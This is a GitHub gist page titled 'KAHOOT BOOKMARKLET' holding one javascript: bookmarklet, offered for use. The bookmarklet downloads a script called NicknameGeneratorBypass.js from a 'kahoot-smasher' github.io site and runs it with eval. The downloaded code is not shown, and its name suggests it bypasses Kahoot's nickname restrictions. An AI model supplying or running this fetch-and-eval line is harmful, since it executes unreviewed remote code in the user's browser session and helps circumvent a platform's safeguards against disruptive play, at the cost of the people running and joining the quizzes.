Skip to content

Instantly share code, notes, and snippets.

@amhooman
Created March 1, 2023 18:16
Show Gist options
  • Select an option

  • Save amhooman/84fb03590448a73b881b4e1b1dbdb6bf to your computer and use it in GitHub Desktop.

Select an option

Save amhooman/84fb03590448a73b881b4e1b1dbdb6bf to your computer and use it in GitHub Desktop.
KAHOOT BOOKMARKLET
javascript:fetch('https://thatfrueddued.github.io/kahoot-smasher/NicknameGeneratorBypass.js').then(function(response) { response.text().then(function(text) { eval(text); }); });
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment